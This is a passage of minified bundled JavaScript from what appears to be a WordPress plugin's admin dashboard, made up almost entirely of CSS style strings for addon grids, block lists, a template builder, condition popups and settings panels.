auto;border-radius:4px;box-sizing:border-box;background-color:var(--postx-white-color);box-shadow:0 1px 2px 0 rgba(8,68,129,.2);overflow-x:hidden;transition:.5s}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup::-webkit-scrollbar{display:none}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-addon-settings-title{padding:15px 20px;background:#e3f1ff;position:sticky;top:0;z-index:1}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form{display:flex;flex-direction:column;justify-content:space-between;height:100%;position:relative}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-body{position:relative;padding:40px 40px 30px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer{text-align:center;background:#e3f1ff;padding:16px;position:sticky;bottom:32px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer .onloading{cursor:no-drop}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer .onloading svg{height:14px;width:14px;vertical-align:middle;margin-left:4px;animation:ultp-spin 1s linear infinite;color:#fff}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addons-setting-save{color:var(--postx-white-color);cursor:pointer;width:600px;border:none;position:fixed;right:0;bottom:0;padding:10px 25px;background:var(--postx-primary-color)}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close{position:fixed;top:40px;right:11px;color:var(--postx-white-color);font-size:25px;cursor:pointer;border:none;padding:0px 9px 3px;background-color:var(--postx-dark-color);z-index:99}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close::after{content:"×"}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close:hover{background:red}.addons_promotions{margin-top:40px;border:1px solid #b9cff0;background-color:#e0ecff;padding:30px;border-radius:4px;text-align:center;font-size:16px;color:#091f36}.addons_promotions.ultp-gs{max-width:80%;margin-left:auto;margin-right:auto}.addons_promotions .addons_promotions_label{line-height:20px;font-size:16px}.addons_promotions .addons_promotions_btns{display:flex;flex-wrap:wrap;justify-content:center;gap:12px;margin-top:15px}.addons_promotions .addons_promotions_btns .addons_promotions_btn{padding:6px 12px;border-radius:4px;cursor:pointer;font-size:12px}.addons_promotions .addons_promotions_btns .addons_promotions_btn.btn1{background:#07cc92;color:#fff;text-decoration:none}.addons_promotions .addons_promotions_btns .addons_promotions_btn.btn2{background:#fff;color:#000;text-decoration:none}.ultp_dash_key_features{margin-top:60px;margin-bottom:30px}.ultp_dash_key_features .ultp_dash_key_features_content{display:grid;grid-template-columns:repeat(4, 1fr);gap:20px;margin-top:30px}.ultp_dash_key_features .ultp_dash_key_features_label{font-size:18px;font-weight:600;margin-bottom:10px;color:#091f36}.ultp_dash_key_features .ultp-description{font-size:14px}.ultp-description{color:#4a4a4a;font-size:14px}.ultp-description-notice{margin-top:5px;color:#e68429}.ultp-plugin-required{font-size:14px;text-align:center;display:inline-block;padding:20px 0px 0;color:var(--postx-warning-button-color);margin-top:-16px}@media only screen and (max-width: 1200px){.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp_dash_key_features .ultp_dash_key_features_content{grid-template-columns:1fr 1fr 1fr}}@media only screen and (max-width: 1100px){.ultp-dashboard-addons-container .ultp-addons-container-grid{grid-template-columns:auto}.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 768px){.ultp-dashboard-addons-container .ultp-addons-container-grid{grid-template-columns:auto}.addons_promotions.ultp-gs{max-width:100%}.ultp-gettingstart-message{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp_dash_key_features .ultp_dash_key_features_content{grid-template-columns:1fr}}@media only screen and (max-width: 425px){.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(1, 1fr)}}.ultp-addon-group{background:#fff;border-radius:8px;padding:32px}`,""]);const u=c},3038:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-dashboard-blocks-container{display:flex;flex-direction:column;gap:50px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .frequency{margin-bottom:0px !important}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{margin-top:20px;display:grid;gap:30px;grid-template-columns:1fr 1fr 1fr}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item{display:flex;justify-content:space-between;padding:20px 15px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-item-meta{display:flex;gap:10px;align-items:center;font-size:16px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-item-meta img{height:25px;width:25px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option{display:flex;align-items:center;gap:10px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option a{text-decoration:none}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option .ultp-option-tooltip{display:flex;align-items:center;text-decoration:none;gap:3px;font-size:14px;color:#575a5d}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option .ultp-option-tooltip .dashicons{height:unset;width:unset;line-height:unset;font-size:14px;color:#575a5d}@media only screen and (max-width: 1350px){.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 990px){.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{grid-template-columns:1fr}}",""]);const l=i},725:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-builder-dashboard__content{width:100%;margin:0;display:grid;grid-template-columns:200px 1fr}.ultp-builder-dashboard__content .ultp-builder-tab__content{display:flex;flex-direction:column;justify-content:flex-start}.ultp-builder-dashboard__content .ultp-builder-tab__content .ultp-tab__content{height:100%}.ultp-builder-tab__option{background:#edf6ff;border:1px solid rgba(3,127,255,.03);min-height:100vh;border-radius:4px 0 0 4px}.ultp-builder-tab__option ul{padding:0px;margin:0px}.ultp-builder-tab__option ul li{font-size:14px;cursor:pointer;color:#091f36;padding:12px 0px 12px 30px;display:flex;align-items:center;transition:400ms}.ultp-builder-tab__option ul li.active,.ultp-builder-tab__option ul li.active *{color:var(--postx-primary-color);background-color:var(--postx-white-color)}.ultp-builder-tab__option ul li:hover,.ultp-builder-tab__option ul li:hover *{color:var(--postx-primary-color)}.ultp-builder-tab__option ul li img{margin-right:8px;height:20px;text-align:left}.ultp-builder-tab__option ul li span{margin-right:8px;font-size:24px;text-align:left;display:block;line-height:1;height:auto}.ultp-builder-tab__option ul ul li{padding-left:50px}.ultp-builder-tab__option .ultp-popup-sync{font-size:14px;cursor:pointer;display:flex;align-items:center;transition:400ms;padding:12px 0px 12px 30px;margin-bottom:0}.ultp-builder-tab__option .ultp-popup-sync i{margin-right:4px;font-size:25px;height:auto;width:auto}.ultp-builder-tab__option .ultp-popup-sync:hover,.ultp-builder-tab__option .ultp-popup-sync:hover *{color:var(--postx-primary-color)}.ultp-builder-tab__content .ultp-builder-tab__heading{display:flex;align-items:center;justify-content:space-between;padding:0 0 20px 30px;max-height:30px}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title .heading{display:inline-block;font-size:18px;text-transform:capitalize}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title span{margin-right:20px;padding-right:20px;border-right:1px solid #575a5d;font-size:18px;cursor:pointer;color:#575a5d}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title span svg{height:12px;width:14px;color:#575a5d;margin-right:5px}.ultp-builder-tab__content .ultp-tab__content{display:none !important;opacity:0;transition:.3s;padding:30px;background:var(--postx-white-color);border-radius:0 4px 4px 0;box-shadow:0 1px 2px 0 rgba(8,68,129,.2)}.ultp-builder-tab__content .ultp-tab__content.active{display:block !important;opacity:100;transition:.3s}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab{display:flex;flex-direction:column;gap:20px}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper{background:#f6f8fa;padding:15px 20px 15px 20px;border-radius:4px;border:solid 1px #eaedf2}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading{display:flex;align-items:center;flex-wrap:wrap;gap:15px;justify-content:space-between}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta{display:flex;gap:15px;color:#172c41}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta>div{font-size:14px;font-weight:normal;margin:0px !important}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta>div>span{font-weight:600;text-transform:capitalize}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__content div{display:flex;align-items:center;justify-content:space-between}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control{display:flex;gap:12px;position:relative;min-height:26px;align-items:center}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a{text-decoration:none;font-size:13px;color:#575a5d;display:flex;align-items:center;justify-content:center;text-transform:capitalize}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a span{font-size:12px;color:#091f36;height:auto}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a.status{min-width:56px}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-dashboard__action{line-height:1.2;cursor:pointer}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-action__active{position:absolute;top:52px;cursor:pointer;right:-20px;padding:10px 36px;background:#f9f9f9;box-shadow:4px 6px 12px -10px #000;z-index:9999}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-action__active .dashicons{font-size:18px;top:3px;position:relative}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-condition__edit{padding:5px 10px;border-radius:2px;font-size:12px;border:none;color:#fff;cursor:pointer;background-color:#091f36}.ultp-builder-tab__content .ultp-builder-items{display:grid;gap:30px;grid-template-columns:1fr 1fr 1fr}.ultp-builder-tab__content .ultp-builder-items .newScreen{border-radius:4px;border:solid 1px #eaedf2;background-color:#fff}.ultp-builder-tab__content .ultp-builder-items .newScreen .listInfo{padding:8px 12px;border-bottom:solid 1px #eaedf2;text-transform:capitalize;margin-bottom:12px}.ultp-builder-tab__content .ultp-builder-items .newScreen .listInfo .ultp_h6{font-size:16px;font-weight:500}.ultp-builder-tab__content .ultp-builder-items .newScreen .listOverlays{height:250px}.ultp-builder-tab__content .ultp-builder-items .newScreen .listOverlays img{height:100%;object-fit:fill}.premadeScreen .ultp-item-list{border-radius:4px;border:solid 1px #eaedf2;background-color:#fff}.premadeScreen .ultp-item-list .listInfo{padding:10px;display:flex;justify-content:space-between;align-items:center;border-bottom:solid 1px #eaedf2;text-transform:capitalize;flex-wrap:wrap;row-gap:10px}.premadeScreen .ultp-item-list .listInfo .title{font-size:14px;color:#091f36;font-weight:500}.premadeScreen .ultp-item-list .listInfo .title .parent{font-weight:400;font-size:12px;color:rgba(9,31,54,.67)}.premadeScreen .ultp-item-list .listInfo .btnImport{display:flex;align-items:center;border-radius:4px;background-image:linear-gradient(#18dd5c, #0c8d20);padding:5px 10px;color:#fff;font-size:12px}.premadeScreen .ultp-item-list .listInfo .btnImport svg{height:12px;color:#fff;margin-right:6px}.premadeScreen .ultp-item-list .listInfo .btnImport span{color:#fff}.premadeScreen .ultp-item-list .listInfo .ultp-upgrade-pro-btn{font-size:12px;padding:5px 10px}.premadeScreen .ultp-item-list .listOverlay{box-sizing:border-box;position:relative;line-height:0;padding:10px}.premadeScreen .ultp-item-list .listOverlay img{border-radius:4px}.premadeScreen.ultp-builder-items.ultpheader .bg-image-aspect,.premadeScreen.ultp-builder-items.ultpfooter .bg-image-aspect{aspect-ratio:1.8}.premadeScreen.ultp-builder-items.ultpheader .ultp-list-blank-img img,.premadeScreen.ultp-builder-items.ultpfooter .ultp-list-blank-img img{max-height:190px}.premadeScreen.ultp-builder-items.ultpheader .dashicons-visibility,.premadeScreen.ultp-builder-items.ultpfooter .dashicons-visibility{font-size:50px}.ultp-builder-items .ultp-item-list img{width:100%;max-width:100%}.ultp-item-list{position:relative}.ultp-premade-item{transition:.3s}.ultp-premade-item:hover{box-shadow:1px 4px 18px -12px #000}.ultp-list-white-overlay{cursor:pointer;font-weight:600;width:100%;height:100%;justify-content:center;align-items:center;top:0;left:0;position:absolute;display:flex;align-items:center;color:var(--postx-primary-color);font-size:12px}.ultp-list-white-overlay .dashicons{margin-right:15px;font-size:32px;display:block;height:auto;color:var(--postx-primary-color)}.ultp-condition-wrapper{z-index:100000;position:fixed;top:0;left:0;width:100%;height:100%;display:flex;justify-content:center;align-items:center;background:rgba(0,0,0,.7)}.ultp-condition-wrapper .ultp-condition-popup{max-width:700px;width:100%;position:relative;background:#fff;padding:40px 60px;border-radius:4px;height:fit-content;max-height:90%;overflow:unset !important;margin:50px auto 0}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close{position:absolute;top:0;right:-52px;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff;transition:400ms}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close svg{color:#000}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close:hover{background:red}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close:hover svg{color:#fff}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content{display:flex;gap:30px;align-items:center;justify-content:center;flex-wrap:wrap;position:relative}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap{height:450px;width:100%;display:flex;flex-direction:column;align-items:center;overflow-y:scroll !important;-ms-overflow-style:none;scrollbar-width:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap-heading{margin-bottom:14px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap::-webkit-scrollbar{display:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-items{width:600px;margin-top:20px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .btnCondition{margin-top:20px;color:#fff;border-radius:4px;background-color:#091f36;padding:8px 16px;border:none;cursor:pointer}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition_cancel{cursor:pointer;position:absolute;right:-30px;color:#de1010;font-size:24px;line-height:.7;transition:400ms}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition_cancel:hover{color:#c00a0a}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields,.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap__field{display:flex;align-items:center;position:relative;width:100%}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap__field{background:#fff;margin-top:15px;border:1px solid #eaedf2;border-radius:2px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields{padding:0px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields select{color:#575a5d;border:none;margin-right:0;padding-top:7px;padding-bottom:7px;border-right:1px solid #eaedf2;border-radius:0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields select:last-child{border-right:none;width:100%;max-width:100%}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__label{display:inline-flex;align-items:center;background:#7c8084;padding:4px 8px;border-radius:2px;color:#fff}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__label::-webkit-scrollbar{display:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown{text-align:left;width:100%;display:flex;align-items:center;position:relative}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-condition-text{width:100%;display:inline-flex;padding:0 10px 0 10px;align-items:center}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-condition-text .ultp-condition-arrow{font-size:15px;display:inline-block;padding-left:15px;line-height:1.5}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown span{cursor:pointer}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-dropdown-value__close{color:#fff;background:#000;margin-left:8px;border-radius:50%;font-size:14px;line-height:1;height:auto;width:auto}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__default{width:100%;display:block;padding:12px 0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__content{width:100%;display:flex;align-items:center;justify-content:space-between}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__content .ultp-condition-arrow{top:3px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search{background:#fff;position:absolute;left:0;z-index:1;top:39px;width:100%;padding:10px;border-radius:0;box-sizing:border-box;border:1px solid #eaedf2}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search input{width:100%;border-radius:2px;min-height:34px;border:1px solid #eaedf2}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search li{cursor:pointer;text-align:left;margin-bottom:12px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-search li:last-child{margin-bottom:0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-save-condition{width:100%;font-size:14px;position:sticky;bottom:0;color:#fff;border-radius:4px;padding:15px;border:none;cursor:pointer;background-image:linear-gradient(#399aff, #016cdb)}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-save-condition span{font-size:17px;margin-left:4px;color:#fff}.ultp-builder-items .ultp-premade-img__blank{height:100%;display:flex;align-items:center;justify-content:center;padding:20px}.ultp-premade-img__blank img{max-height:395px}.ultp-list-blank-img img{opacity:.1}.ultp-list-blank-img a{text-decoration:none !important}@media only screen and (max-width: 1100px){.ultp-builder-dashboard__content{gap:20px;grid-template-columns:auto}.ultp-builder-dashboard__content .ultp-builder-tab__option{min-width:300px;width:fit-content;min-height:fit-content}.ultp-builder-tab__content .ultp-builder-items{grid-template-columns:1fr 1fr}}.ultp-builder-create-btn{text-transform:capitalize}",""]);const l=i},5735:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'@media only screen and (max-width: 1350px){.ultp-menu-items div{margin:0px 10px 0 0}}@media only screen and (max-width: 1250px){.ultp-menu-items div a:after{bottom:-2px;height:2px}}.dash-faq-container{min-width:170px}.dash-faq-container a{text-decoration:none;font-size:14px;color:#575a5d;display:flex;gap:8px;align-items:center;width:-webkit-fill-available;padding-right:32px}.dash-faq-container a:focus{box-shadow:none}.dash-faq-container a .dashicons{padding-top:2px}.dash-faq-container a:hover{color:var(--postx-primary-color)}.dash-faq-container{display:flex;flex-direction:column;gap:15px;padding:25px;position:absolute;right:20px;top:70px;border-radius:2px;box-shadow:0 2px 4px 0 rgba(8,68,129,.2);background-color:#fff;z-index:1}.dash-faq-container::before{content:"";content:"";position:absolute;right:0px;top:-29px;font:normal 42px dashicons;color:#fff}.ultp-dashboard-container-grid{display:grid;grid-template-columns:auto 424px;gap:32px}@media only screen and (max-width: 1250px){.ultp-dashboard-container-grid{display:flex;flex-direction:column}}@media only screen and (max-width: 1250px){.ultp-dashboard-container-grid{display:flex;flex-direction:column}}.ultp-dashboard-container-grid .ultp-dashboard-content{display:flex;gap:32px;flex-direction:column}.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-banner,.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-pro-promo,.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-blocks{padding:32px}.ultp-dashboard-container-grid .ultp-dashboard-content .ultp-dash-item-con{box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863)}.ultp-dash-banner{padding:32px;display:flex;gap:80px;justify-content:space-between}@media screen and (max-width: 758px){.ultp-dash-banner{padding:16px;flex-direction:column-reverse;gap:8px;width:fit-content}}.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-title{font-weight:600;font-size:24px;line-height:32px;color:#070707}@media screen and (max-width: 768px){.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-title{font-size:18px;display:inline-block}}.ultp-dash-banner .ultp-dash-banner-left .ultp-dash-banner-description{max-width:365px;font-size:16px;line-height:24px;color:#41474e;margin-top:14px}.ultp-dash-banner .ultp-dash-banner-left .ultp-primary-alter-button{padding:10px 24px;margin-top:32px}.ultp-dash-banner .ultp-dash-banner-right{width:352px}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img{position:relative}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img img{max-width:100%}@keyframes pulse-border{0%{box-shadow:0 0 0 5px rgba(241,19,108,.6)}70%{box-shadow:0 0 0 15px rgba(255,67,142,0)}100%{box-shadow:0 0 0 5px rgba(255,67,142,0)}}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img .ultp-dash-banner-right-play-button{cursor:pointer;width:64px;height:64px;border-radius:50%;background-color:#fff;display:flex;align-items:center;justify-content:center;position:absolute;top:50%;right:50%;transform:translate(50%, -50%);animation:pulse-border 1.2s ease-in infinite}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-img .ultp-dash-banner-right-play-button svg{width:24px;height:24px;color:#070707;margin-top:-1px;margin-left:1px}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-video{width:352px;height:240px;border-radius:8px;overflow:hidden;box-shadow:0px 0px 42.67px 0px rgba(212,212,221,.4784313725)}.ultp-dash-banner .ultp-dash-banner-right .ultp-dash-banner-right-video iframe{width:100%;height:100%}.ultp-dash-pro-promo{padding:32px;background-color:#fff;display:flex;gap:80px;justify-content:space-between}@media only screen and (max-width: 1400px){.ultp-dash-pro-promo{flex-direction:column-reverse;gap:24px}}@media only screen and (max-width: 758px){.ultp-dash-pro-promo{flex-direction:column-reverse;gap:24px;padding:16px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-title{font-weight:600;font-size:24px;line-height:32px;color:#070707}@media only screen and (max-width: 1250px){.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-title{font-size:18px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-description{max-width:365px;font-size:16px;line-height:24px;color:#41474e;margin-top:14px}@media only screen and (max-width: 1250px){.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-description{font-size:14px}}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-primary-alter-button{margin-top:32px}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature{display:flex;column-gap:24px;row-gap:12px;flex-wrap:wrap;margin-top:24px}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature .ultp-dash-pro-promo-left-keyfeature-item{display:flex;align-items:center;gap:6px;font-weight:500;font-size:14px;line-height:20px;color:#070707}.ultp-dash-pro-promo .ultp-dash-pro-promo-left .ultp-dash-pro-promo-left-keyfeature .ultp-dash-pro-promo-left-keyfeature-item svg{width:20px;height:20px;color:#1f66ff}.ultp-dash-pro-promo .ultp-dash-pro-promo-right-img{max-width:352px;object-fit:contain}.ultp-dash-blocks{padding:32px}@media only screen and (max-width: 1250px){.ultp-dash-blocks{padding:16px}}.ultp-dash-blocks .ultp-dash-blocks-heading{display:flex;justify-content:space-between;align-items:center;margin-bottom:24px}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-dash-blocks-heading-title{font-weight:600;font-size:18px;line-height:24px;color:#0a0d14}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-transparent-button{color:#1f66ff !important}.ultp-dash-blocks .ultp-dash-blocks-heading .ultp-transparent-button svg{fill:#1f66ff !important;width:20px;height:20px}.ultp-dash-blocks .ultp-dash-blocks-items{display:grid;grid-template-columns:1fr 1fr 1fr;gap:16px}@media only screen and (max-width: 1500px){.ultp-dash-blocks .ultp-dash-blocks-items{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 1250px){.ultp-dash-blocks .ultp-dash-blocks-items{grid-template-columns:1fr}}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-dash-blocks-item{display:flex;gap:8px;align-items:center;justify-content:space-between;border:1px solid #e6e6e6;border-radius:8px;background:#fbfbfb;box-shadow:none}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta{display:flex;align-items:center;gap:8px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta .ultp-blocks-item-icon{width:24px;height:24px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-item-meta .ultp-blocks-item-title{font-weight:500;font-size:14px;line-height:20px;color:#2e2e2e}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-control-option{display:flex;align-items:center;gap:8px}.ultp-dash-blocks .ultp-dash-blocks-items .ultp-blocks-control-option .ultp-option-tooltip{font-size:12px;line-height:16px;color:#6e6e6e;text-decoration:none}',""]);const l=i},9455:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-dashboard-general-settings-container{display:grid;grid-template-columns:auto 360px;gap:32px}.ultp-dashboard-general-settings-container .ultp-general-settings{height:fit-content;width:-webkit-fill-available;padding:32px}.ultp-dashboard-general-settings-container .ultp-general-settings form{margin-top:40px}.ultp-dashboard-general-settings-container .ultp-general-settings .skeletonOverflow{display:flex;gap:30px;flex-direction:column;margin-top:40px}.ultp-dashboard-general-settings-container .ultp-general-settings .onloading{cursor:no-drop}.ultp-dashboard-general-settings-container .ultp-general-settings .onloading svg{height:14px;width:14px;vertical-align:middle;margin-left:4px;animation:ultp-spin 1s linear infinite;color:#fff}@media only screen and (max-width: 1100px){.ultp-dashboard-general-settings-container{grid-template-columns:auto;justify-items:center}.ultp-dashboard-general-settings-container .ultp-general-settings-content-right{width:360px}}@media only screen and (max-width: 768px){.ultp-dashboard-general-settings-container .ultp-general-settings-content-right{width:100%}}",""]);const l=i},886:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-setting-hellobar{background:#037fff;padding:6px 0;text-align:center;color:rgba(255,255,255,.85);font-size:14px}.ultp-setting-hellobar a{margin-left:4px;font-weight:700;font-size:14px;color:#fff}.ultp-setting-hellobar strong{color:#fff;font-weight:700}.ultp-ring{-webkit-animation:ring 4s .7s ease-in-out infinite;-moz-animation:ring 4s .7s ease-in-out infinite;animation:ring 4s .7s 